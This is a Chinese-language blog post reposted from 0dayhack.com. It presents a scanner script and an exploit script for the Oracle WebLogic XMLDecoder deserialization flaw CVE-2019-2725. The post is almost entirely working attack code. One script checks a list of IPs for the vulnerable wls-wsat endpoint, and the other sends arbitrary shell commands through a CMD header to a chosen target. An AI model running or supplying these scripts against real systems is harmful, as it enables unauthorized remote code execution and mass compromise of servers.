Weblogic反序列化远程代码执行漏洞exp(CVE-2019-2725)

利用点是weblogic的xmldecoder反序列化漏洞,只是构造巧妙的利用链对Oracle官方历年来对这个漏洞点的补丁绕过.

POC:

IP填入ip.txt 后用poc检测

import requests
import sys
import time
import random
import threading
def exec_cmd(ip,cmd):
	url="http://"+ip+"/wls-wsat/CoordinatorPortType11"
	headers={
	'User-Agent': 'Apache-HttpClient/4.1.1 (java 1.5)',
	'CMD' : cmd,
	'SOAPAction':'""',
	'Content-Type':'text/xml'
	}
	with open('payload.txt','rb') as f :
		payloads=f.read()
	r=requests.post(url,headers=headers,data=payloads,timeout=5)
	return r.content.decode()
def test_poc(ip):
	check=str(int(time.time())+int(random.uniform(1000,9999)))
	out=exec_cmd(ip,'echo '+check)
	if check in out:
		print('vul finds:'+ip)
def main(): 
	print("put ips in ip.txt ")
	with open('ip.txt') as f:
		for line in f.readlines():
			try:
				test_poc(line)
			except :
				pass
	print("End")		
if __name__ == '__main__':
	main()

EXP:

import requests
import sys
def exec_cmd(ip,cmd):
	url="http://"+ip+"/wls-wsat/CoordinatorPortType11"
	headers={
	'User-Agent': 'Apache-HttpClient/4.1.1 (java 1.5)',
	'CMD' : cmd,
	'SOAPAction':'""',
	'Content-Type':'text/xml'
	}
	with open('payload.txt','rb') as f :
		payloads=f.read()
	r=requests.post(url,headers=headers,data=payloads)
	return r.content.decode()
def main():
	if len(sys.argv)<3:
		print('usage:exp.py www.0dayhack.com:8080 whoami')
		sys.exit()
	ip=sys.argv[1]
	cmd=sys.argv[2]
	out=exec_cmd(ip,cmd)
	print(out)
if __name__ == '__main__':
	main()

转自:https://www.0dayhack.com/post-883.html

发表评论

电子邮件地址不会被公开。 必填项已用*标注